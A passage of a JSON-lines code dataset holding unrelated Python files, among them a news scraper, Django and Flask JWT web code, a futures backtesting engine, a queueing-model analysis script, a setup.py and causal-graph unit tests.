\"fiftyeight\",\r\n \"fiftynine\", \"sixty\", \"sixtyone\", \"sixtytwo\", \"sixtythree\", \"sixtyfour\", \"sixtyfive\", \"sixtysix\",\r\n \"sixtyseven\", \"sixtyeight\", \"sixtynine\", \"seventy\", \"seventyone\", \"seventytwo\", \"seventythree\",\r\n \"seventyfour\", \"seventyfive\", \"seventysix\", \"seventyseven\", \"seventyeight\", \"seventynine\", \"eighty\",\r\n \"eightyone\", \"eightytwo\", \"eightythree\", \"eightyfour\", \"eightyfive\", \"eightysix\", \"eightyseven\",\r\n \"eightyeight\", \"eightynine\", \"ninety\", \"ninetyone\", \"ninetytwo\", \"ninetythree\", \"ninetyfour\",\r\n \"ninetyfive\", \"ninetysix\", \"ninetyseven\", \"ninetyeight\", \"ninetynine\",\r\n \"hundred\", ] # Array for numerating articles\r\n final_links = [] # Creating empty array for links\r\n while 1:\r\n temp_url_input = input(\"url: \")\r\n if temp_url_input == \".\":\r\n break\r\n else:\r\n final_links.append(temp_url_input)\r\n i = 0\r\n final_articles = [] # Creating empty array for articles\r\n for url_article in final_links: # Through loop searching for articles' text\r\n pre_source_article = urlopen(url_article).read().decode('utf-8', 'ignore') # Reading pages\r\n source_article = BeautifulSoup(pre_source_article, \"html.parser\") # Converting to BS type\r\n text_article = BeautifulSoup(str(source_article.find_all('div', class_=\"article__text text \")),\r\n \"html.parser\") # searching for articles' text\r\n final_articles.append('Article number ' + numbers[i] + ':\\n' + text_article.text) # putting it to array\r\n i += 1;\r\n print('.') # loading string\r\n return final_articles\r\n\r\nomitted_month = int(input(\"Please enter the number of omitted month: \"))\r\nomitted_day = int(input(\"Please enter the number of omitted day: \"))\r\ncurrent_year = int(datetime.datetime.now().strftime(\"%Y\"))\r\ncurrent_date = datetime.date(current_year, omitted_month, omitted_day)\r\n\r\n\r\na = connecting_function(parsing_news_omitted())\r\n\r\nroot = etree.Element(\"parsed\")\r\netree.tostring(root)\r\nsub_root = etree.Element(\"news_for_today\", date=current_date.strftime(\"%d\") + \".\" + current_date.strftime(\r\n \"%m\") + \".\" + current_date.strftime(\"%Y\"),\r\n time=time.strftime(\"%H:%M:%S\"))\r\nroot.append(sub_root)\r\n\r\nfor i in range(0, len(a)):\r\n etree.SubElement(sub_root, \"article\", number=str(i)).text = str(a[i])\r\n\r\nhandle = str(etree.tostring(root, encoding='utf-8', xml_declaration=False, pretty_print=False))\r\nhandle = handle.replace('b\\'', '')\r\nhandle = handle.replace('\\'', '')\r\nhandle = handle.replace(' ', '')\r\nhandle = handle.replace('\\\\', '')\r\nwith open(\"../news/\" + current_date.strftime(\"%B\") + \"/\" + current_date.strftime(\"%d\") + \"_\" + current_date.strftime(\r\n \"%m\") + \"_\" + current_date.strftime(\"%Y\") + \".xml\",\r\n \"w\") as text_file:\r\n print(handle, file=text_file)\r\n","sub_path":"some_staff/parsing_news_omitted.py","file_name":"parsing_news_omitted.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"326318111","text":"from django.conf.urls import *\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns,static\nfrom blog.views import *\nfrom PSI import settings\n\nurlpatterns = patterns('',\n url(r'^$', index),\n url(r'^login', loginn),\n url(r'^auth', auth_view),\n url(r'^logout', logout_view),\n url(r'^loggedin', loggedin),\n url(r'^invalid', invalid_login),\n url(r'^register', register_user),\n url(r'^registration_success', register_success),\n url(r'^profile/$', profile),\n url(r'^new_post/$', 'blog.views.post_new', name='blog_new_post'),\n url(r'^new_category/$', 'blog.views.category_new', name='blog_new_category'),\n # url(r'^profile/(?P<author>[^\\.]+).html', 'blog.views.author_profile', name='view_profile_author'),\n url(r'^view/(?P<slug>[^\\.]+).html', view_post, name='view_blog_post'),\n url(r'^category/(?P<slug>[^\\.]+).html', view_category, name='view_blog_category'),\n\n\n\n)\n","sub_path":"PSI/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"313166454","text":"# -*- coding: utf-8 -*-\n# vim: set fileencoding=utf-8 :\n\n\"\"\"Personalized model fields types.\"\"\"\n\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom django.db import models\nfrom django.core import exceptions\nfrom django.utils.datastructures import SortedDict\n\nimport re\n\n_R_ARRAY = re.compile('^{(.*)}$')\n\nclass DOWArrayField(models.Field):\n \"\"\"Modelisation of a DOW type (Day Of Week).\n \n Database type: integer[]\n Python type: list\n \n Remark: Have been developed on a postgresql database. Compatibility with \n other database types has not been tested\n \n \"\"\"\n __metaclass__ = models.SubfieldBase\n\n DOWS = [0, 1, 2, 3, 4, 5, 6]\n\n def __init__(self, *args, **kwargs):\n super(DOWArrayField, self).__init__(*args, **kwargs)\n\n def is_dow(self, field_data, all_data):\n \"\"\"Validator.\n\n Check that:\n\n + each element of the list is an integer\n + each element of the list is on the list of authorized values\n\n \"\"\"\n for value in field_data:\n try:\n if int(value) not in self.DOWS:\n raise exceptions.ValidationError(_(\"\"\n \"%(day)d is not a valid day of week.\" % {'day':\n int(value)}))\n except ValueError:\n raise exceptions.ValidationError(_(\"\"\n \"This list must contain only integers.\"))\n\n def db_type(self):\n \"\"\"Return the column type (the DB one)\n \n \"\"\"\n return 'integer[]'\n\n def to_python(self, value):\n \"\"\"Convert the database returned value into a python type\n\n \"\"\"\n if isinstance(value, list):\n return value\n try:\n value_list = _R_ARRAY.match(value).group(1)\n except (AttributeError, TypeError):\n return []\n if not value_list:\n return []\n return value_list.split(',')\n\n def get_db_prep_value(self, value):\n \"\"\"reverse of the methode \"to_python\".\"\"\"\n # convert the unicode chars to ints\n value = [int(value) for value in value]\n self.is_dow(value, None)\n value.sort()\n return \"{%s}\" % ','.join([\"%d\" % v for v in value])\n\n","sub_path":"src/bv/client/utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"11178286","text":"class Solution:\r\n # @param A : integer\r\n # @return a list of list of integers\r\n def solve(self, A):\r\n if A==0:\r\n return []\r\n if A==1:\r\n ans=[[1]]\r\n elif A>=2:\r\n ans=[[1],[1,1]]\r\n for i in range(2,A):\r\n row=[1]\r\n j=0\r\n while j<len(ans[i-1])-1:\r\n row.append(ans[i-1][j]+ans[i-1][j+1])\r\n j+=1\r\n row.append(1)\r\n ans.append(row)\r\n return ans","sub_path":"Programming/Arrays/Simulation Array/Pascal Triangle.py","file_name":"Pascal Triangle.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"472682128","text":"\nimport datetime\nimport talib\nimport time\n\nimport pandas as pd\nimport numpy as np\n\nclass IntradayEventEngine:\n\n DEFAULT = dict(\n transaction_cost = 0.0,\n )\n\n def __init__(self, data):\n self.data = data\n self.portfolio = {}\n self.history = {}\n self.syms = self.data.liquidity.columns.tolist()\n self.syms_mapping = {self.syms[i]: i for i in range(len(self.syms))}\n\n def to_eod(self, reference):\n \"\"\" Function to calculate minutes to EOD \"\"\"\n output = reference['to_day_eod']\n if reference['is_broken_day']:\n if (reference['to_night_eod'] >= 0) and (reference['to_day_eod'] >= 0):\n output = reference['to_night_eod']\n else:\n output = reference['to_day_eod']\n return output\n\n def from_sod(self, reference):\n \"\"\" Function to calculate minutes from SOD \"\"\"\n output = reference['from_night_sod']\n if reference['is_broken_day']:\n if (reference['from_night_sod'] >= 0) and (reference['from_day_sod'] >= 0):\n output = reference['from_day_sod']\n else:\n output = reference['from_night_sod']\n\n def load_strategies(self, strategies):\n \"\"\" Load strategies \"\"\"\n self.strategies = strategies\n self.strategies_names = []\n cache_config = {}\n # request_cache\n for strategy in self.strategies:\n cache_config.update(strategy.request_cache())\n self.strategies_names += [strategy.name]\n self.data.cache_custom(cache_config)\n\n def update_holding(self, orders, snap):\n \"\"\" Function to update holding \"\"\"\n if self.execute:\n\n position_change = np.array(orders)\n new_position = self.portfolio['position'] + position_change\n # current_price = np.array([snap[sym]['open'] for sym in self.syms])\n\n # update pnl at beginning of bar\n self.update_snap(snap = snap, price = 'open')\n\n # # update cost\n # increase_position = (self.portfolio['position'] * position_change) >= 0\n # new_cost = self.portfolio['cost'] * self.portfolio['position'] + position_change * current_price\n # self.portfolio['cost'][increase_position] = new_cost[increase_position]\n # self.portfolio['cost'][new_position == 0] = 0\n\n # update position\n self.portfolio['position'] = new_position\n # self.portfolio['position'] = self.portfolio['position'] + position_change\n \n # update min/max price\n self.portfolio['max_price'][new_position == 0] = 0\n self.portfolio['min_price'][new_position == 0] = 1e+4\n \n # update transaction cost\n transaction_cost = np.abs(position_change).sum(axis = 1) * self.config['transaction_cost']\n self.portfolio['value'] = self.portfolio['value'] - transaction_cost\n\n # update new position\n self.update_snap(snap = snap, price = 'open')\n\n def update_snap(self, snap, price = 'open'):\n \"\"\" Function to update portfolio \"\"\"\n # current_price = np.array([snap[sym][price] for sym in self.syms])\n # position_return = self.portfolio['position'] * (current_price - self.portfolio['last_price'])\n # position_return[self.portfolio['last_price'] == 0] = 0\n # self.portfolio['value'] = self.portfolio['value'] + position_return.sum(axis = 1)\n # self.portfolio['last_price'] = (self.portfolio['position'] != 0).dot(np.diag(current_price))\n\n current_price = np.array([snap[sym][price] for sym in self.syms])\n position_return = self.portfolio['position'].dot(np.diag((current_price - self.portfolio['last_price'])))\n # position_return[self.portfolio['last_price'] == 0] = 0\n self.portfolio['value'] = self.portfolio['value'] + position_return.sum(axis = 1)\n self.portfolio['last_price'] = current_price\n\n self.portfolio['max_price'] = self.portfolio['max_price'].clip(min = current_price)\n self.portfolio['min_price'] = self.portfolio['min_price'].clip(max = current_price)\n\n # self.\n def record(self, dt):\n \"\"\" Function to record portfolio status \"\"\"\n self.history[self.portfolio['index']] = {\n 'value': self.portfolio['value'],\n 'position': self.portfolio['position'],\n }\n\n def run(self, start_date, end_date, config = None):\n \"\"\" Function to run backtest \"\"\"\n\n print('Running backtest for {n} strategies'.format(\n n = len(self.strategies)\n ))\n self.config = self.DEFAULT.copy()\n self.config.update(config if config is not None else {})\n\n start_date = start_date.strftime('%Y-%m-%d')\n end_date = end_date.strftime('%Y-%m-%d')\n\n dt_index = self.data.dt_profile.index[self.data.dt_profile['date'].between(start_date, end_date)]\n start_index = self.data.dt.get_loc(dt_index.min())\n end_index = self.data.dt.get_loc(dt_index.max())\n\n _, reference = self.data.snap_cache(index = start_index)\n liquidity = self.data.liquidity.loc[reference['date']].nlargest(2)\n self.major = liquidity.index[0]\n self.minor = liquidity.index[1]\n self.orders_template = [[0] * len(self.syms)] * len(self.strategies_names)\n self.orders = self.orders_template.copy()\n self.execute = False\n self.time = {\n 'snap': 0,\n 'execute_orders': 0,\n 'strategies': 0,\n 'update_snap': 0,\n 'record': 0,\n 't1': 0,\n }\n self.portfolio = {\n 'index' : None,\n 'value' : np.zeros((len(self.strategies_names))),\n 'position' : np.zeros((len(self.strategies_names), len(self.syms))),\n 'last_price' : np.zeros((len(self.syms))),\n 'max_price' : np.zeros((len(self.strategies_names), len(self.syms))),\n 'min_price' : np.zeros((len(self.strategies_names), len(self.syms))),\n }\n # run thru minute bar\n for index in range(start_index, end_index + 1):\n self._next(index)\n \n def _next(self, index):\n \"\"\" Function to move to next time stamp \"\"\"\n # snap cache data\n t = time.time()\n snap, reference = self.data.snap_cache(index = index)\n self.time['snap'] += time.time() - t\n self.portfolio['index'] = index\n if reference['is_night_sod']:\n self.orders = {} \n self.sod = index\n liquidity = self.data.liquidity.loc[reference['date']].nlargest(2)\n self.major = liquidity.index[0]\n self.minor = liquidity.index[1]\n\n \n\n # execute orders at the beginning of bar\n t = time.time()\n self.update_holding(self.orders, snap)\n self.orders = self.orders_template.copy()\n self.execute = False\n self.time['execute_orders'] += time.time() - t\n\n # update portfolio status at the end of bar\n t = time.time()\n self.update_snap(snap = snap, price = 'close')\n self.time['update_snap'] += time.time() - t\n\n # record portfolio status\n t = time.time()\n self.record(index)\n self.time['record'] += time.time() - t\n\n # generate new orders at the end of this bar\n if not reference['is_day_eod']:\n snap_major = snap[self.major]\n close = snap_major.get('close')\n to_eod = self.to_eod(reference)\n from_sod = self.from_sod(reference)\n position_data = self.portfolio['position'][:, self.syms.index(self.major)]\n position_mapping = [0.0] * len(self.syms)\n position_mapping[self.syms_mapping[self.major]] = 1.0\n # price_change = (self.portfolio['last_price'] - self.portfolio['cost'])[:, self.syms.index(self.major)]\n\n drawdown = close - self.portfolio['max_price'][:, self.syms.index(self.major)]\n drawdown_short = self.portfolio['min_price'][:, self.syms.index(self.major)] - close\n drawdown[position_data < 0] = drawdown_short[position_data < 0]\n # print(position_data)\n # print(self.portfolio['max_price'][:, self.syms.index(self.major)])\n # print(self.portfolio['min_price'][:, self.syms.index(self.major)])\n # print(close)\n # print(drawdown)\n # print('===========================')\n t = time.time()\n for i, strategy in enumerate(self.strategies):\n position_change = strategy.next_snap(\n close = close,\n drawdown = drawdown[i],\n position = position_data[i],\n snap_major = snap_major,\n # snap_minor = snap_minor,\n # reference = reference,\n to_eod = to_eod\n # from_sod = from_sod\n )\n if position_change != 0:\n self.orders[i] = [x * position_change for x in position_mapping]\n self.execute = True\n self.time['strategies'] += time.time() - t\n\n def get_history(self):\n \"\"\" Function to aggregate history data \"\"\"\n wealth = pd.DataFrame.from_dict({k: v['value'] for k, v in self.history.items()}, orient = 'index', columns = self.strategies_names)\n wealth.index = self.data.dt[wealth.index]\n position = pd.DataFrame.from_dict({k: v['position'].sum(axis = 1) for k, v in self.history.items()}, orient = 'index', columns = self.strategies_names)\n position.index = self.data.dt[position.index]\n output = dict(\n wealth = wealth,\n position = position,\n )\n return output\n\n\n\nif __name__ == \"__main__\":\n\n import time\n from data.process_data import FuturesData\n from strategy import SMA, RSI\n # from backtest import IntradayEventEngine\n\n START_DATE = datetime.date(2019, 6, 1)\n END_DATE = datetime.date(2019, 6, 30)\n\n # get data\n fd = FuturesData(\n sym = 'RB',\n start_date = START_DATE,\n end_date = END_DATE, \n )\n\n strategies = [SMA(\n n_fast = f, \n n_slow = 21, \n atr_n = 21,\n atr_scale = 3,\n interval = 5, \n shift = 0) \n for f in [3, 5, 8]]\n iee = IntradayEventEngine(fd)\n iee.load_strategies(strategies)\n t = time.time()\n iee.run(\n start_date = START_DATE, \n end_date = END_DATE,\n config = {'transaction_cost': 0.25}\n )\n print('Running Time: {:.2f}'.format(time.time() - t))\n print('Snap Time: {:.2f}'.format(iee.time['snap']))\n print('Execution Time: {:.2f}'.format(iee.time['execute_orders']))\n print('Strategies Time: {:.2f}'.format(iee.time['strategies']))\n print('Update Snap Time: {:.2f}'.format(iee.time['update_snap']))\n print('Record Time: {:.2f}'.format(iee.time['record']))","sub_path":"legacy/backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":11116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"441381251","text":"from flask import request, abort\nfrom flask_restful import Resource\nfrom flask_jwt_extended import (create_access_token,\n create_refresh_token, jwt_required, jwt_refresh_token_required,\n get_jwt_identity, get_raw_jwt)\nfrom marshmallow import ValidationError\n\nfrom . import person_blueprint\nfrom project.model import PersonModel, PersonSchema\n\n# /person/insert\nclass InsertPerson(Resource):\n def post(self):\n data = GetPersonSchema()\n\n if PersonModel.find_by_email(data['email']):\n return {'message': 'Person {} already exists'.format(data['email'])}\n\n new_person = PersonModel(\n email = data['email'],\n plaintext_password = data['password']\n )\n\n new_person.save_to_db()\n access_token = create_access_token(identity=data['email'])\n refresh_token = create_refresh_token(identity=data['email'])\n return {\n 'message': 'Person {} was created'.format(data['email']),\n 'access_token': access_token,\n 'refresh_token': refresh_token\n }\n\n\n# /login\nclass PersonLogin(Resource):\n def post(self):\n data = GetPersonSchema()\n \n current_person = PersonModel.find_by_email(data['email'])\n\n if not current_person:\n return {'message': 'Person {} doesn\\'t exist'.format(data['email'])}\n\n if PersonModel.verify_hash(current_person.s_password, data['password']):\n access_token = create_access_token(identity=data['email'])\n refresh_token = create_refresh_token(identity=data['email'])\n return {\n 'message': 'Logged in as {}'.format(data['email']),\n 'access_token': access_token,\n 'refresh_token': refresh_token\n }\n else:\n return {'message': 'Wrong credentials'}\n\n# /logout/access\nclass PersonLogoutAccess(Resource):\n def post(self):\n return {'message': 'Person logout'}\n \n# /logout/refresh\nclass PersonLogoutRefresh(Resource):\n def post(self):\n return {'message': 'Person logout'}\n \n# /person/token/refresh\nclass TokenRefresh(Resource):\n @jwt_refresh_token_required\n def post(self):\n current_person = get_jwt_identity()\n access_token = create_access_token(identity=current_person)\n return {\n 'message': 'Successfully refreshed access_token',\n 'access_token': access_token\n }\n \n# /people\nclass AllPeople(Resource):\n def get(self):\n return PersonModel.return_all()\n\n def delete(self):\n #removing for now\n #return PersonModel.delete_all()\n return {'message': 'Not implemented'}\n \n# /secret\nclass SecretResource(Resource):\n @jwt_required\n def get(self):\n return {\n 'answer': 42\n }\n\n##############################################\n### FUNCTIONS\n##############################################\n\ndef GetPersonSchema():\n schema = PersonSchema()\n \n if not request.json:\n abort(400, \"Expected input but did not receive any\")\n\n try:\n data = schema.load(request.json)\n\n # if some weird stuff or poorly formatted stuff is passed in\n except ValidationError as err:\n abort(400, err.messages)\n\n return data\n","sub_path":"project/person/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"454507902","text":"import os\nimport sys\nimport json\nimport copy\nimport re\nimport subprocess\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom functools import reduce\n\n\ntest_no = 1\n\n\n\n# test = {\"folder\":\"middleware_1\", \"title\":\"Baseline with one middleware\", \"instances\":6, \"from\":\"memtier\"}\n# test = {\"folder\":\"middleware_1\", \"title\":\"Baseline with one middleware\", \"instances\":6, \"from\":\"middleware\"}\n# test = {\"folder\":\"middleware_2\", \"title\":\"Baseline with two middleware\", \"instances\":6, \"from\":\"memtier\"}\n# test = {\"folder\":\"middleware_2\", \"title\":\"Baseline with two middleware\", \"instances\":6, \"from\":\"middleware\"}\n\n# test = {\"folder\":\"writes_1\", \"title\":\"Write-only load\", \"instances\":6, \"from\":\"memtier\"}\ntest = {\"folder\":\"writes_1\", \"title\":\"Write-only load\", \"instances\":6, \"from\":\"middleware\"}\n\n# test = {\"folder\":\"gets_1\", \"title\":\"Read-only load, non sharded\", \"instances\":1, \"from\":\"memtier\"}\n# test = {\"folder\":\"gets_1\", \"title\":\"Read-only load, non sharded\", \"instances\":1, \"from\":\"middleware\"}\n# test = {\"folder\":\"gets_2\", \"title\":\"Read-only load, sharded\", \"instances\":1, \"from\":\"memtier\"}\n# test = {\"folder\":\"gets_2\", \"title\":\"Read-only load, sharded\", \"instances\":1, \"from\":\"middleware\"}\n\n# test = {\"folder\":\"twok\", \"title\":\"Read-only load, sharded\", \"instances\":1, \"from\":\"memtier\"}\n\n# basefolder=\"./archivio/scp_logs/middleware_2_set_real/scp_logs/\"+test['folder']\n# basefolder=\"./archivio/scp_logs/middleware_2_get_real/scp_logs/\"+test['folder']\n# basefolder=\"./archivio/scp_logs/middleware_2/2018-11-15_12:34:26/\"+test['folder']\n\nbasefolder=\"./archivio/scp_logs/\"+test['folder']+\"_real/scp_logs/\"+test['folder']\n# basefolder=\"./scp_logs/\"+test['folder']\n\nmemtier_files = subprocess.run(\"find . -wholename '\"+basefolder+\"/*_*/*.log'\", shell=True, stdout=subprocess.PIPE).stdout.decode('ascii')\ntest_time = json.load(open(memtier_files.split()[0]))['configuration']['test_time']\nprint(\"\\x1b[31;1mTest time:\", test_time, \"\\x1b[0m\")\n\ndata = {}\nkeywords = []\nworkers = []\n# keywords2 = ['throughput', 'resp_time']\nkeywords2 = ['throughput', 'resp_time', 'queue_time', 'queue_size', 'waiting']\n# keywords2 = ['throughput', 'resp_time', 'waiting']\n\n\nfor client in os.listdir(basefolder):\n if test['from'] == 'middleware' and \"_\" not in client: #its a middleware\n for log in os.listdir(os.path.join(basefolder, client)):\n print(log)\n req_type = 'set' if 'set' in log else 'get'\n numbers = [int(s) for s in re.split(\"[^0-9]\", log) if s.isdigit()]\n no_clients = numbers[0]\n rep = numbers[1]\n work = numbers[2] if len(numbers) > 1 else 0\n if req_type not in data:\n data[req_type] = {}\n if req_type not in keywords:\n keywords += [req_type]\n if no_clients not in data[req_type]:\n data[req_type][no_clients] = {}\n if work not in data[req_type][no_clients]:\n data[req_type][no_clients][work] = {}\n if work not in workers:\n workers += [work]\n if rep not in data[req_type][no_clients][work]:\n # data[req_type][no_clients][work][rep] = {\"throughput\":[], \"latency\":[]}\n data[req_type][no_clients][work][rep] = dict((k, []) for k in keywords2)\n\n no_lines = 0\n with open(os.path.join(os.path.join(basefolder, client, log)), \"r\") as mylog:\n for line in mylog.readlines():\n no_lines += 1\n # if (no_clients == 32) and (work == 64): print(log, float(no_lines),float(work))\n tput = []\n with open(os.path.join(os.path.join(basefolder, client, log)), \"r\") as mylog:\n for line in mylog.readlines():\n if len(line) < 10: continue\n d = dict((e1[0], e1[1]) for e1 in [a.split(\"=\") for a in line.split(\",\")])\n # data[req_type][no_clients][work][rep]['latency'] += [float(d['resp_time'])]\n for k in keywords2:\n if k == 'throughput':\n data[req_type][no_clients][work][rep]['throughput'] += [(float(d['gets']) + float(d['sets']))/test_time]\n else:\n data[req_type][no_clients][work][rep][k] += [float(d[k])]\n if test_no == 2:\n break\n\n# print(data)\n\nx = []\ny = dict((e1,dict((w, dict((e2, []) for e2 in keywords2)) for w in workers)) for e1 in keywords)\ne = dict((e1,dict((w, dict((e2, []) for e2 in keywords2)) for w in workers)) for e1 in keywords)\n\nmu_dict = {}\n\nfor no_clients in sorted(data[keywords[0]]):\n x += [no_clients*test[\"instances\"]]\n for req_type in keywords:\n for work in sorted(workers):\n t_reps = [np.sum(data[req_type][no_clients][work][rep]['throughput']) for rep in data[req_type][no_clients][work]]\n mu_dict[work] = max(t_reps)\n y[req_type][work]['throughput'] += [np.mean(t_reps)]\n e[req_type][work]['throughput'] += [np.std(t_reps)]\n\n for k in keywords2[1:]:\n if k == 'throughput':\n reps = [np.sum(data[req_type][no_clients][work][rep][k]) for rep in data[req_type][no_clients][work]]\n else:\n reps = [np.mean(data[req_type][no_clients][work][rep][k]) for rep in data[req_type][no_clients][work]]\n y[req_type][work][k] += [np.mean(reps)]\n e[req_type][work][k] += [np.std(reps)]\n\nfor work in sorted(workers):\n mu = mu_dict[work]\n la = y['set'][work]['throughput']\n ro = [a/mu for a in la]\n print(mu, ro)\n mu /= 1000.0\n\n\n\n print(\"********************* \",work, \" *********************\")\n\n print()\n print(\"%20s\" % \"Clients\", end=' ')\n for n in [6,12,24,48,96,192]:\n print(\"%10d\" % n, end=' ')\n print()\n print()\n\n print(\"%20s\" % \"$\\lambda$\", end=' ')\n for n in range(len(y['set'][work]['resp_time'])):\n print(\"%10.2f\" % la[n], end=' ')\n print()\n print(\"%20s\" % \"µ\", end=' ')\n for n in range(len(y['set'][work]['resp_time'])):\n print(\"%10.0f\" % mu*1000, end=' ')\n print()\n print(\"%20s\" % \"$\\\\rho$\", end=' ')\n for n in range(len(y['set'][work]['resp_time'])):\n print(\"%10.3f\" % ro[n], end=' ')\n print()\n print()\n\n print(\"%20s\" % \"Response time\", end=' ')\n for n in range(len(y['set'][work]['resp_time'])):\n print(\"%10.2f\" % y['set'][work]['resp_time'][n], end=' ')\n print()\n print(\"%20s\" % \"$E[r]$\", end=' ')\n for n in range(len(y['set'][work]['resp_time'])):\n print(\"%10.2f\" % ((1.0/float(mu)) / (1.0 - float(ro[n]))), end=' ')\n print()\n print()\n\n print(\"%20s\" % \"Queue size\", end=' ')\n for n in range(len(y['set'][work]['queue_size'])):\n print(\"%10.2f\" % y['set'][work]['queue_size'][n], end=' ')\n print()\n print(\"%20s\" % \"$E[n_q]$\", end=' ')\n for n in range(len(y['set'][work]['resp_time'])):\n print(\"%10.2f\" % (ro[n]*ro[n] / (1.0 - float(ro[n]))), end=' ')\n print()\n print()\n\n print(\"%20s\" % \"Queue time\", end=' ')\n for n in range(len(y['set'][work]['queue_time'])):\n print(\"%10.2f\" % y['set'][work]['queue_time'][n], end=' ')\n print()\n print(\"%20s\" % \"$E[w]$\", end=' ')\n for n in range(len(y['set'][work]['resp_time'])):\n print(\"%10.2f\" % (ro[n]*(1.0/float(mu)) / (1.0 - float(ro[n]))), end=' ')\n print()\n print()\n\n\nprint(y['set'][32]['throughput'])\n\n\n# c=json.dumps(data, indent=2)\n# print(c.replace(\",\",\".\"))\n\n# print(json.dumps(data, indent=2))\n# print(data)\n\n# subplot = 221\n# sns.set(style='ticks', palette='Set2')\n\n# workers = sorted(workers)\n\n","sub_path":"mm1.py","file_name":"mm1.py","file_ext":"py","file_size_in_byte":7673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"541607725","text":"#!/usr/bin/env python\n# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# THIS FILE IS MANAGED BY THE GLOBAL REQUIREMENTS REPO - DO NOT EDIT\nimport os\n\nimport profimp\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\n# In python < 2.7.4, a lazy loading of package `pbr` will break\n# setuptools if some other modules registered functions in `atexit`.\n# solution from: http://bugs.python.org/issue15881#msg170215\n\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nconfig = {\n \"name\": \"profimp\",\n \"version\": profimp.__version__,\n \"author\": \"Boris Pavlovic\",\n \"author_email\": \"boris@pavlovic.me\",\n \"url\": \"http://boris-42.me\",\n \"description\": \"profimp - generates tree of imports profiles\",\n \"long_description\": read(\"README.rst\"),\n\n \"classifiers\": [\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Information Technology\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3.4\"\n ],\n\n \"packages\": [\"profimp\"],\n\n \"entry_points\": {\n \"console_scripts\": [\"profimp=profimp.main:main\"]\n }\n}\n\n\nsetup(**config)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"588671220","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Tests for parallel world graphs and counterfactual graphs.\"\"\"\n\nfrom tests.test_algorithm import cases\nfrom y0.algorithm.identify.cg import (\n World,\n _get_directed_edges,\n extract_interventions,\n has_same_confounders,\n has_same_function,\n is_inconsistent,\n is_not_self_intervened,\n is_pw_equivalent,\n make_counterfactual_graph,\n make_parallel_worlds_graph,\n merge_pw,\n node_not_an_intervention_in_world,\n nodes_attain_same_value,\n nodes_have_same_domain_of_values,\n parents_attain_same_values,\n stitch_counterfactual_and_doppleganger_neighbors,\n stitch_counterfactual_and_dopplegangers,\n stitch_counterfactual_and_neighbors,\n stitch_factual_and_doppleganger_neighbors,\n stitch_factual_and_dopplegangers,\n value_of_self_intervention,\n)\nfrom y0.dsl import A, B, D, Event, W, X, Y, Z\nfrom y0.examples import (\n figure_9a,\n figure_9b,\n figure_9c,\n figure_9d,\n figure_11a,\n figure_11b,\n figure_11c,\n)\nfrom y0.graph import NxMixedGraph\n\nx, y, z, d, w = -X, -Y, -Z, -D, -W\n\n\nclass TestCounterfactualGraph(cases.GraphTestCase):\n \"\"\"Tests parallel worlds and counterfactual graphs.\"\"\"\n\n def test_world(self):\n \"\"\"Test that a world contains an intervention.\"\"\"\n with self.assertRaises(TypeError):\n input_world1: World = World([-x])\n 3 in input_world1 # noqa\n\n with self.assertRaises(TypeError):\n input_world1: World = World([3])\n 3 in input_world1 # noqa\n\n input_world2 = World([-x])\n self.assertFalse(+x in input_world2)\n self.assertFalse(+y in input_world2)\n self.assertTrue(-x in input_world2)\n\n def assert_uedge_set_equal(self, expected, actual):\n \"\"\"Assert that two undirected edge sets are equal.\"\"\"\n return self.assertEqual(\n {frozenset(edge) for edge in expected}, {frozenset(edge) for edge in actual}\n )\n\n def test_make_parallel_worlds(self):\n \"\"\"Test that parallel worlds graphs are correct.\"\"\"\n expected = figure_9b.graph\n actual = make_parallel_worlds_graph(figure_9a.graph, {frozenset([-x]), frozenset([-d])})\n expected2 = make_parallel_worlds_graph(figure_9a.graph, {(-x, -z)})\n self.assert_graph_equal(expected, actual)\n self.assert_graph_equal(expected2, make_parallel_worlds_graph(figure_9a.graph, {(-x, -z)}))\n self.assertTrue(Y @ (-z, -x) in expected2.nodes())\n self.assertTrue(Y @ (-x, -z) in expected2.nodes())\n\n def test_has_same_function(self):\n \"\"\"Test that two variables have the same value.\"\"\"\n self.assertTrue(has_same_function(D @ X, D))\n self.assertFalse(has_same_function(D @ D, D))\n self.assertFalse(has_same_function(X, X @ +x))\n self.assertTrue(has_same_function(X @ D, X))\n 